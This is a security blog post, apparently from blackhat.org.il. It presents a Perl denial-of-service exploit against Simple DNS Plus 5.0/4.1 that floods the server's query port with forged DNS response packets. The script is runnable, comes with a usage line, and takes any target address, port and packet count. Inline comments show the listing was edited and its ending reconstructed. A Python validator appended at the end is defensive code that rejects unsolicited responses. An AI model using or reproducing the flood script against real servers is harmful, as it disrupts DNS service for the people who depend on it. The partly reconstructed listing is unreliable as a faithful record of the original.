Source: http://www.blackhat.org.il/
After reading the story about Dan Kaminsky's DNS cache poisoning attack and watching his ridiculous YouTube cornflakes commercial, I decided to trace the source of this vulnerability. So, in order to understand how Kaminsky's attack is any different from traditional DNS cache poisoning, I started digging into some RFCs/documentation and playing with the protocol to see if I could find some clues/logical faults. Yet I didn't find anything worthy, and I wonder if Kaminsky's finding is just some algorithm for guessing the 16-bit transaction ID field a little bit faster.

Anyway, while I was doing some tests on this Simple DNS server, I found that if I repeatedly send DNS server response packets, as if I were a root DNS server, to the client port of the DNS server, it will remotely cause a denial of service.

So what we have here is a DNS response packet built from scratch that basically floods the source port of some "Simple DNS server Plus" and denies its service.

P.S.: I used multiple pack functions to make it more convenient; I could have just squeezed it into one pack, but what the heck...
#!/usr/bin/perl
#
# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
#
# usage: sdns-dos.pl <dns server> <dns source port> <num of packets>
#
# Exploit written by Exodus.
# http://www.blackhat.org.il

use strict;
use warnings;
use IO::Socket;
use Socket qw(inet_aton);

if (@ARGV < 3) {
    print("usage: sdns-dos.pl <dns server> <dns source port> <num of packets>\n");
    exit(1);   # the original fell through and ran with missing arguments
}

# <dns source port> is the port the server sends its own queries from, i.e. where it expects replies
my $sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'udp')
    || die("Can't connect to DNS server: $!");

my $address = $ARGV[0];

# DNS header (12 bytes): transaction ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
my $trans        = pack("H4", "1337");
my $flags        = pack("B16", "1000010110110000"); # QR=1 AA=1 RD=1 RA=1 AD=1 CD=1, RCODE 0
my $question     = pack("H4", "0001");
my $answerRR     = pack("H4", "0001");
my $authorityRR  = pack("H4", "0000");
my $additionalRR = pack("H4", "0000");

# question section: the server's own address as length-prefixed labels, type A, class IN
my $type  = pack("H4", "0001"); # A host name
my $class = pack("H4", "0001"); # IN
my $address2 = '';
foreach my $part (split(/\./, $address)) {
    my $packedlen = pack("H2", sprintf("%02x", length($part)));
    $address2 .= $packedlen . $part;
}
my $query = $address2 . "\000" . $type . $class;

# answer section: owner name is a compression pointer (c00c) back to the question name
my $aname  = pack("H4", "c00c");
my $atype  = pack("H4", "0001");
my $aclass = pack("H4", "0001");
my $ttl    = pack("H8", "0000008d");   # 141 seconds
my $dlen   = pack("H4", "0004");
my $addr   = inet_aton("127.0.0.1");
my $answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;

my $payload = $trans . $flags . $question . $answerRR . $authorityRR . $additionalRR . $query . $answer;

print "sending $ARGV[2] packets... ";
for (my $i = 0; $i < $ARGV[2]; $i++) {   # original loop used <=, sending one packet too many
    # the listing was cut off here; the send is what the post describes
    $sock->send($payload);
}
print "done\n";
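The weakness the post exercises is a resolver that processes whatever arrives on its outgoing query port. The defensive counterpart is to match every inbound response against the queries actually in flight before it reaches any resolver logic. The Python below is an added example, not the post's code nor anything from Simple DNS Plus: it constructs a packet with the same layout the Perl script builds (same header, question, c00c answer pointer) and runs it through a validator that accepts a response only when its (transaction ID, qname, qtype, qclass) matches an outstanding query sent to that source address. The `outstanding` table, the addresses and the sample packets are constructed assumptions.

```python
import struct

def encode_name(name):
    """'192.0.2.1' -> length-prefixed labels plus a zero terminator."""
    return b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"

def build_response(txid, qname, rdata, ttl=0x8D):
    """Constructed sample in the post's layout: flags 0x85B0, one question, one A answer."""
    header = struct.pack("!HHHHHH", txid, 0x85B0, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # type A, class IN
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4)  # c00c -> question name
    return header + question + answer + bytes(int(o) for o in rdata.split("."))

def decode_name(pkt, off, depth=0):
    """Read a possibly compressed name; returns (name, offset just past it)."""
    if depth > 4:
        raise ValueError("compression pointer loop")
    labels = []
    while True:
        n = pkt[off]  # IndexError on a truncated packet is caught by the caller
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0 == 0xC0:  # pointer: low 14 bits are an offset into the packet
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(pkt, ptr, depth + 1)[0])
            return ".".join(labels), off + 2
        labels.append(pkt[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n

def parse_question(pkt):
    """Header and question section of a DNS message; raises on malformed input."""
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, bool(flags & 0x8000), qname.lower(), qtype, qclass  # bit 15 = QR

def accept_response(pkt, src, outstanding):
    """outstanding: {(txid, qname, qtype, qclass): server asked}. Returns (accepted, reason)."""
    try:
        txid, is_resp, qname, qtype, qclass = parse_question(pkt)
    except (ValueError, IndexError, struct.error, UnicodeDecodeError):
        return False, "malformed"
    if not is_resp:
        return False, "not a response"
    if outstanding.get((txid, qname, qtype, qclass)) != src:
        return False, "unsolicited"
    return True, "matches outstanding query"
```

A resolver that drops on "unsolicited" or "malformed" before any further parsing treats the flood as noise; matching on source address and port as well as the question narrows forgery further, and a truncated or self-referencing name never reaches the answer section.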